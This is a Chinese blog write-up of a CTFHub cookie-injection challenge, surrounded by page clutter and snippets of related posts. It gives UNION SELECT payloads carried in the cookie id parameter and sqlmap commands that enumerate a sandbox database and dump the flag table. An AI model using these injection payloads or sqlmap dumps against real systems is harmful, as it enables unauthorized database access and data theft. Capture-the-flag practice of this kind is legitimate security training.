CTFHUB--cookie注入wp

最新推荐文章于 2024-06-13 09:00:30 发布
最新推荐文章于 2024-06-13 09:00:30 发布
阅读量139 收藏
点赞数
文章标签: 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HZSZLX/article/details/121051920
版权

一、burpsuite注入

1、拿到数据库名

id=123+union+select+database(),2#

2、获得表名

 id=123+union+select group_concat(table_name),2 from information_schema.tables where table_schma='sqli'#

3、获得列名

 id=123+union+select+group_concat(column_name),2 from information_schema.columns where table_schema='sqli' and table_name='yqpsrnvbyb' #

 

 4、得到flag

id=123+union+select+group_concat(xqnzflzigi),2 from yqpsrnvbyb  #

 

二、sqlmap自动注入 

1、得到当前数据库信息

sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" --dbs --level 2

 

 2、进行查询

sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli --tables --level 2

 3、得到flag

sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T bbyivpdjwh --columns --dump --level 2

HZSZLX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub-Cookie注入-wp
z1moq的博客
05-18 170
Cookie注入 sqlmap 设置代理,使用BurpSuite进行截断,并复制出Request信息,放置于txt文件中 使用 python sqlmap.py -r 123.txt --level=2 进行扫描 ​ 发现存在Cookie中id参数的注入漏洞 使用 python sqlmap.py -u "..." --dbs 爆出数据库名 python sqlmap.py -u "..." -D sqli -tables 爆出表名 python sqlmap.py -u "
CTFHub-web(cookie注入)
m0_64444909的博客
04-11 5070
文章目录前言一、解题步骤二、使用步骤1.引入库2.读入数据总结 前言 一、解题步骤 (1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=i,很明显存在sql注入 (2)我们抓包来一步步的进行注入会更方便一些 1.我们用order by 语句来排序查询数据库有几行 (1,2都可以回显,直到3时无法回显,说明数据库有两行) id=1 order by 3; 2.接下来用联合查询语句union select语句来注入,从而判断显示位 (回显Data:2 正常)
CTFHUB-web-SQL注入
ookami6497的博客
11-29 725
CTFHUB SQL
CTFHub-Web-SQL注入
IceCream的博客
04-30 1067
1.题目说输入1,先将1输入查看结果2.接着输入4-1,发现输出的结果为4-1,判定存在整数型注入3.查询字段数,出现了回显,判断这里的字段数为24.判断注入点在2的位置,也就是data5.查询数据库名,得知为sqli6.查询该库下的表名,得知为news、flag7.查询flag表下的字段8.发现了flag字段,去查询flag字段的内容,最终得到flag。
CTFHUB-WEB--cooki注入wp
DSX666_888的博客
10-23 168
<1、sqlmap自动化工具> 1、检查漏洞(肯定有) 语句: sqlmap -u "网址" 2、查库(?1即为库名)、查表(?2即为表名)、查列(?3即为列名)、查数据 sqlmap -u "?" --cookie "id=0" --level 2 --dbs sqlmap -u "?" --cookie "id=0" --level 2 -D ?1 --tables sqlmap -u "?" --cookie "id=0" --level 2 -D ?1 -T ?2 --.
CTFHub-Web(sql注入)
weixin_55404107的博客
10-19 174
ctfhub-Web题目——解题小思路
CTFHub-Web-sql注入练习
Atkx's Blog
11-15 546
目录整数型注入字符型注入 整数型注入 1.判断注入 输入1 输入?id=1 and 1=1,正常回显 输入?id=1 and 1=2,返回错误。 2.判断字段数 当?id=1 order by 2 时回显正常,当?id=1 order by 3时无回显,所以字段数为2 3.爆数据库名,当前数据库名为sqli ?id=1 and 1=2 union select 1,database() 4.爆表名,有两个表,一个是news,另外一个是flag ?id=1 and 1=2 union select
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1882
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
# pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # ...
flask-session-cookie-manager
01-29
使用python脚本更改或生成cookie
cookieconsent-wpplugin:Cookie同意WordPress插件
02-05
将插件文件上传到/wp-content/plugins/osano-cookie-consent目录,或直接通过WordPress插件屏幕安装插件。 通过WordPress中的“插件”屏幕激活插件。 使用设置-> Cookie同意来启用和配置Cookie同意弹出窗口。 执照...
react-use-cookie-watcher:React钩子以观看浏览器 cookie
07-24
@fcannizzaro/react-use-cookie-watcher React钩子以观看浏览器 cookie安装yarn add @fcannizzaro/react-use-cookie-watcher用法 import React , { Component } from 'react'import { useCookieWatcher , useCookie ...
Cookie-Editor-1.12.2.zip
12-30
名称:Cookie-Editor ---------------------------------------- 版本:1.12.2 作者:https://cookie-editor.cgagnier.c 分类:其他 ---------------------------------------- 概述:简单而强大的Cookie编辑器,可...
【redis的基本数据类型】
最新发布
m0_50116974的博客
06-13 493
压缩列表的基本信息包括压缩列表的大小,压缩列表的长度以及最后一个entry的偏移,之所以要有这个偏移,是为了找到最后一个entry,而每个entry都记录上一个元素的大小,通过计算就知道上一个entry的地址,这样方便的从后向前进行遍历。的结构,其分为两部分,8字节的Redis对象元数据信息,8字节的指针,其中Redis对象的元数据信息存储了类型的LRU信息,真正的编码格式等等,而如果字符串存储的是数字类型,则复用了8字节的指针的位置。的操作,但是当列表的元素非常少的时候,其内部使用。
canal应用
qq_33816292的博客
06-12 129
canal分享模块链接。
源码编译安装LAMP
潇的博客
06-12 824
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
C#操作MySQL从入门到精通(16)——使用子查询
qq_34059233的博客
06-09 123
我们在查询数据的过程中有时候查询的数据不是从数据库中来的,而是从另一个查询的结果来的,这时候就需要使用子查询,本文进行详细介绍!
Spring Boot 事务传播机制详解
zhangkai__的博客
06-08 1008
详细解释springboot中的事务传播机制
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值